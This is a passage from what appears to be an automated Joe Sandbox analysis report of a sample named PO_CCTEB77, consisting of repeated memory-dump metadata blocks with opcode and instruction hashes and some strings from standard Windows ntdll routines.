                                                                            • Instruction ID: 09e01f498cbfaf6453d4f295919aa14610e06ab336ac92c85e2b913ec90b9f66
                                                                            • Opcode Fuzzy Hash: 53e2fd810ff5a4485f710178bd4935e04d3a84e6f491d835e481da3aaefa9109
                                                                            • Instruction Fuzzy Hash: 1A900263641500474140715848054067009A7E3301395C115A1558560CC7188A59936A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5c5c8dc82ac063d09844493c75156c0f0abd3f5e0c479737a12074398d5a5381
                                                                            • Instruction ID: b5c126fb2de15391a50a859bcb06f6223de92fb5f4791cb87582439f59cb00d2
                                                                            • Opcode Fuzzy Hash: 5c5c8dc82ac063d09844493c75156c0f0abd3f5e0c479737a12074398d5a5381
                                                                            • Instruction Fuzzy Hash: 1D90023324140807D10471584805686100997D2301F55C011A7028655ED7658A957232
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c8372d196aace8c61a3bb6f023ce3c751ecf0c0e7699e9a44526b1d301f2668a
                                                                            • Instruction ID: 5e575a301b391ba756e6bac4d4891b4a694d45169cb98aa400d516d354517901
                                                                            • Opcode Fuzzy Hash: c8372d196aace8c61a3bb6f023ce3c751ecf0c0e7699e9a44526b1d301f2668a
                                                                            • Instruction Fuzzy Hash: 9F90023364540807D15071584415746100997D2301F55C011A1028654DC7558B5977A2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1ab9553cc2e9482bf49f6fc4ba9356b92d0a38b0c90fa0772c14b8ef871c020b
                                                                            • Instruction ID: 987114977410994bcf56ce9d9446ff96b08ed266cd6f25e0fafac681eacbf600
                                                                            • Opcode Fuzzy Hash: 1ab9553cc2e9482bf49f6fc4ba9356b92d0a38b0c90fa0772c14b8ef871c020b
                                                                            • Instruction Fuzzy Hash: 3190023324544847D14071584405A46101997D2305F55C011A1068694DD7258F59B762
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9cbc63c896ff4a40a2b76b89aeafa48c6f8174167711b24c461d7aa015f18837
                                                                            • Instruction ID: dff79a1577d892636c46d74f21fc9a53cc39affc7984559c62cea13c48772562
                                                                            • Opcode Fuzzy Hash: 9cbc63c896ff4a40a2b76b89aeafa48c6f8174167711b24c461d7aa015f18837
                                                                            • Instruction Fuzzy Hash: 1390023324140807D1807158440564A100997D3301F95C015A1029654DCB158B5D77A2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f8f0c6b744ff24fcddbcd28bd6908a7e74b891633d7c9116d47c75bd47c00520
                                                                            • Instruction ID: 26b01c496a754f26c53a049c7ade2761d6cc43ed87e2b4956339c3e65223abd1
                                                                            • Opcode Fuzzy Hash: f8f0c6b744ff24fcddbcd28bd6908a7e74b891633d7c9116d47c75bd47c00520
                                                                            • Instruction Fuzzy Hash: 879002A3241540974500B2588405B0A550997E2301B55C016E2058560CC6258A559236
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f674be096c6658b4fe0c234090efdb084e916c227d96e97b1b33ee894d175d80
                                                                            • Instruction ID: f540240466e0014c0b17bd654be37648037c51391c2bd6daea7f5532c88c79ef
                                                                            • Opcode Fuzzy Hash: f674be096c6658b4fe0c234090efdb084e916c227d96e97b1b33ee894d175d80
                                                                            • Instruction Fuzzy Hash: 86900227251400070105B5580705507104A97D7351355C021F2019550CD7218A655222
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a9f3b4d4ad5c2186d078491f909ece146e7f489ecbcc68539c98146af3c77b48
                                                                            • Instruction ID: 7f54e1e5405f1f6b49581c67bda364e83cb83bf4d944a2244d25a5e606a50d83
                                                                            • Opcode Fuzzy Hash: a9f3b4d4ad5c2186d078491f909ece146e7f489ecbcc68539c98146af3c77b48
                                                                            • Instruction Fuzzy Hash: 62900227261400070145B558060550B1449A7D7351395C015F241A590CC7218A695322
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8f3aef9c1305aedba56092637a3a08843f085c8ad8baec7609302315056ca809
                                                                            • Instruction ID: fa4cc8f6e5b1f307dc59038436b8484a0af4f671b8948d5bd51da6db7638b77c
                                                                            • Opcode Fuzzy Hash: 8f3aef9c1305aedba56092637a3a08843f085c8ad8baec7609302315056ca809
                                                                            • Instruction Fuzzy Hash: E190023328140407D14171584405606100DA7D2341F95C012A1428554EC7558B5AAB62
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f373815d23d07ecfd002837c312c2a2425dc694b6a4c50c415b7bb7f8a50534d
                                                                            • Instruction ID: 091abb4d92b2326c2fd46d0f2223881b3e3fb3549aabf72057f83afffaed1f7a
                                                                            • Opcode Fuzzy Hash: f373815d23d07ecfd002837c312c2a2425dc694b6a4c50c415b7bb7f8a50534d
                                                                            • Instruction Fuzzy Hash: D0900223282441575545B1584405507500AA7E2341795C012A2418950CC6269A5AD722
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f05f56acebd82c7bbb2c0d233fb9da060a76c96395f3a323d6d84c909f2f98ac
                                                                            • Instruction ID: 83da91625bcf4e3a040bda8114f963cc0ae90eb990ec93fa2b6d48fbc377d71b
                                                                            • Opcode Fuzzy Hash: f05f56acebd82c7bbb2c0d233fb9da060a76c96395f3a323d6d84c909f2f98ac
                                                                            • Instruction Fuzzy Hash: 0590022324544447D10075585409A06100997D2305F55D011A2068595DC7358A55A232
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3f869e79f305fd035e7654650a33d5830beb5802d2dc168435e8a33a038baeff
                                                                            • Instruction ID: 3b4ec45a6a0686b3fede1c0cdc0c39f82a7a1cc22bda9a4fe7a4ffc904d80982
                                                                            • Opcode Fuzzy Hash: 3f869e79f305fd035e7654650a33d5830beb5802d2dc168435e8a33a038baeff
                                                                            • Instruction Fuzzy Hash: F390022B25340007D1807158540960A100997D3302F95D415A1019558CCA158A6D5322
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ae00564115d67cbc86076b53627647f216a520d4d5c741cec6f7b6725e8a2f43
                                                                            • Instruction ID: c2165c56c0e767e2a50ca45fcfe81bad2d143007545c61e5df0d7bd88794fb58
                                                                            • Opcode Fuzzy Hash: ae00564115d67cbc86076b53627647f216a520d4d5c741cec6f7b6725e8a2f43
                                                                            • Instruction Fuzzy Hash: 8F90022334140007D140715854196065009E7E3301F55D011E1418554CDA158A5A5323
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3882f07176eebf8df29e8f50f1ec0cf90a83a24c7a582a7ad78503e506c74f01
                                                                            • Instruction ID: 54ce8d643c02b6334b441b10dc74e19fc1223823385c8b3d809a2091c123c952
                                                                            • Opcode Fuzzy Hash: 3882f07176eebf8df29e8f50f1ec0cf90a83a24c7a582a7ad78503e506c74f01
                                                                            • Instruction Fuzzy Hash: 4890023324140407D10075985409646100997E2301F55D011A6028555EC7658A956232
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1dd7d76fd7a86296e2aecf0f6653f2ced70dfd896e015053535766115077e401
                                                                            • Instruction ID: a67463cdf98d8153ff9436a681755d6093ed1befe61cb9be18035e7048a47c51
                                                                            • Opcode Fuzzy Hash: 1dd7d76fd7a86296e2aecf0f6653f2ced70dfd896e015053535766115077e401
                                                                            • Instruction Fuzzy Hash: 9290022364540407D14071585419706101997D2301F55D011A1028554DC7598B5967A2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 48fcf178caef373851e2aecb82353b225625f65190e993081963fbc5787b8d61
                                                                            • Instruction ID: 1c1e032d8728613da9f67641ddb059729752391594b963decd66de84bfa78cd9
                                                                            • Opcode Fuzzy Hash: 48fcf178caef373851e2aecb82353b225625f65190e993081963fbc5787b8d61
                                                                            • Instruction Fuzzy Hash: 1290023324140407D10071585509707100997D2301F55D411A1428558DD7568A556222
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b3f9b509e0bb5a61582cc35936dc8667679969fbaa7e50b29ab0620f5d497587
                                                                            • Instruction ID: a701860fc40d45aa10d086f78b3184ed2111332a22b95dae2aaa5d34647b0e9d
                                                                            • Opcode Fuzzy Hash: b3f9b509e0bb5a61582cc35936dc8667679969fbaa7e50b29ab0620f5d497587
                                                                            • Instruction Fuzzy Hash: 8090023324140847D10071584405B46100997E2301F55C016A1128654DC715CA557622
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 18d3f74b8df40277baf4832cdefbf5a2209b1a1efaf9e787ef0b12ca357dc8d1
                                                                            • Instruction ID: 1ffc4036e38e8428dc89f0c7cea8cbc4f5b2cc3378c13abe36405579c0022f7a
                                                                            • Opcode Fuzzy Hash: 18d3f74b8df40277baf4832cdefbf5a2209b1a1efaf9e787ef0b12ca357dc8d1
                                                                            • Instruction Fuzzy Hash: DF90023324180407D1007158481570B100997D2302F55C011A2168555DC7258A556672
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 25a048bc2198c9823f9d44e652289b183e1c3a1af3a0d098e9583b47fbd2b304
                                                                            • Instruction ID: db95e60fffd0a48e2068eee4c6363c60366d66b501bec7c6293278e412853659
                                                                            • Opcode Fuzzy Hash: 25a048bc2198c9823f9d44e652289b183e1c3a1af3a0d098e9583b47fbd2b304
                                                                            • Instruction Fuzzy Hash: AF90023324180407D10071584809747100997D2302F55C011A6168555EC765CA956632
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 85c6f0ef2ee7a0c502c8e60d587873698b0c0e1bcaab1a0cb91cad8c24136967
                                                                            • Instruction ID: 08f15f16e4eb909793a0d8e6f6480ec5d34388eaef856833f41d579679ee2d09
                                                                            • Opcode Fuzzy Hash: 85c6f0ef2ee7a0c502c8e60d587873698b0c0e1bcaab1a0cb91cad8c24136967
                                                                            • Instruction Fuzzy Hash: 80900223641400474140716888459065009BBE3311755C121A199C550DC6598A695766
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 00f15a1129dfcfb6a64d2242189e1646870866073c9d5bd7beb5449bd4d2f761
                                                                            • Instruction ID: d15809f37b68935332fcc65db1c123637ee177223ad62905e32cbc6366a44aa8
                                                                            • Opcode Fuzzy Hash: 00f15a1129dfcfb6a64d2242189e1646870866073c9d5bd7beb5449bd4d2f761
                                                                            • Instruction Fuzzy Hash: 7C900223251C0047D20075684C15B07100997D2303F55C115A1158554CCA158A655622
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0110f3b3ce2cafa9c6426ce67675b4e06d60e79ed3f30c2b10ba96f915621da0
                                                                            • Instruction ID: b0723fb9b70aa4434ad805de11eb6a565c4c783b681fdb2b9892dcb114f018c5
                                                                            • Opcode Fuzzy Hash: 0110f3b3ce2cafa9c6426ce67675b4e06d60e79ed3f30c2b10ba96f915621da0
                                                                            • Instruction Fuzzy Hash: 4290026338140447D10071584415B061009D7E3301F55C015E2068554DC719CE566227
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 05bdba576eae642fcc83c4583eec2f82bce2f4c988a78522f611fd7af91ecc84
                                                                            • Instruction ID: 66597f28e6345446d0d57b8df99dc9a257d73fe18976d94e1b3e993d84f322c3
                                                                            • Opcode Fuzzy Hash: 05bdba576eae642fcc83c4583eec2f82bce2f4c988a78522f611fd7af91ecc84
                                                                            • Instruction Fuzzy Hash: 4590026325140047D10471584405706104997E3301F55C012A3158554CC6298E655226
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8abc5cc22acf3135ee78be9ece2d8f70b354a0da5c05196e227751b42a1e137e
                                                                            • Instruction ID: 44e1f45831643369be0a208f5fa6618d0e2aacac1155d3338f533ef6c414a947
                                                                            • Opcode Fuzzy Hash: 8abc5cc22acf3135ee78be9ece2d8f70b354a0da5c05196e227751b42a1e137e
                                                                            • Instruction Fuzzy Hash: EE90022364140507D10171584405616100E97D2341F95C022A2028555ECB258B96A232
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5ba1e2a7e900dee82e0b137773163a304e47696c5ec3c996505a4aff96d4df2d
                                                                            • Instruction ID: 9473edc388d21f423c3b34fd17467de8e7ca8a41dfc65576a119a59cc63aff75
                                                                            • Opcode Fuzzy Hash: 5ba1e2a7e900dee82e0b137773163a304e47696c5ec3c996505a4aff96d4df2d
                                                                            • Instruction Fuzzy Hash: 9E90027324140407D14071584405746100997D2301F55C011A6068554EC7598FD96766
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 505d08af37fa82ef927140204c1d74e708bf6282c32331f4211d2e9bc15a290a
                                                                            • Instruction ID: 2891a4898c371fcee10d842eb13c6aedc117a178528c537262ab37b3e8ab8a8f
                                                                            • Opcode Fuzzy Hash: 505d08af37fa82ef927140204c1d74e708bf6282c32331f4211d2e9bc15a290a
                                                                            • Instruction Fuzzy Hash: 4590026324180407D14075584805607100997D2302F55C011A3068555ECB298E556236
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: f5586962a5010e78495e50fd6a6e6a63af9a9068277d5ee73fe85e031d909396
                                                                            • Instruction ID: eadf4d33aa506ee02ddbea93db23a1277edfbe0beddd79811e3bfa6769cd7d63
                                                                            • Opcode Fuzzy Hash: f5586962a5010e78495e50fd6a6e6a63af9a9068277d5ee73fe85e031d909396
                                                                            • Instruction Fuzzy Hash: 2A51E3B6A0011EAFCB56DBAC8C9497EFBB9BB483407148229F5A5D7681D374DF4087E0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: 207f5fb739e35ac2796f43b913887c9e62d50f0b1cd0a79d5e26aff9d6f1fc00
                                                                            • Instruction ID: 3498b9228738425217c17ddb792a1fe779a3d3dde6dc8366aedf354c158f0748
                                                                            • Opcode Fuzzy Hash: 207f5fb739e35ac2796f43b913887c9e62d50f0b1cd0a79d5e26aff9d6f1fc00
                                                                            • Instruction Fuzzy Hash: 4D51E5B5A00646AEDB30DF9CCCD09BFBBFAEB44304B048469F596D7641E674EB808760
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01834655
                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01834725
                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01834742
                                                                            • Execute=1, xrefs: 01834713
                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018346FC
                                                                            • ExecuteOptions, xrefs: 018346A0
                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01834787
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                            • API String ID: 0-484625025
                                                                            • Opcode ID: b92a8d21efc945468843c92df6bf2bfda77ce73145ca28fa3f9e08d4982ea521
                                                                            • Instruction ID: b098e506c71ae5832023484686eab504a543a0546e814e3143dde028d039ffaa
                                                                            • Opcode Fuzzy Hash: b92a8d21efc945468843c92df6bf2bfda77ce73145ca28fa3f9e08d4982ea521
                                                                            • Instruction Fuzzy Hash: 5A513A3160021DAAEF15ABACDC95FAAB7A8EF58304F4400DDD705E72C1EB709B418F51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm
                                                                            • String ID: +$-$0$0
                                                                            • API String ID: 1302938615-699404926
                                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                            • Instruction ID: 4b671ffe8753e3dd68e70b32d270105e77fa2841b0fc38c0b6a6614a7ee7cd11
                                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                            • Instruction Fuzzy Hash: CB81BF78E0524D8FEFAA8E6CCC517BEBBB1AF45360F184659D861E72D1C7308B408B51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018302BD
                                                                            • RTL: Re-Waiting, xrefs: 0183031E
                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018302E7
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                            • API String ID: 0-2474120054
                                                                            • Opcode ID: 5d97f62573b26a23f58f7fd30d02a7e9f83777ea8f435cfe9fff84cdf7db6e85
                                                                            • Instruction ID: c747c490d9f7ef52519a5cd31034671efdac40bce8d8fdcd06837716e7074df2
                                                                            • Opcode Fuzzy Hash: 5d97f62573b26a23f58f7fd30d02a7e9f83777ea8f435cfe9fff84cdf7db6e85
                                                                            • Instruction Fuzzy Hash: 59E18E706087419FE725CF2CC888B2ABBE1BB88314F140A6DF5A5CB6D1D774DA45CB82
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01837B7F
                                                                            • RTL: Re-Waiting, xrefs: 01837BAC
                                                                            • RTL: Resource at %p, xrefs: 01837B8E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
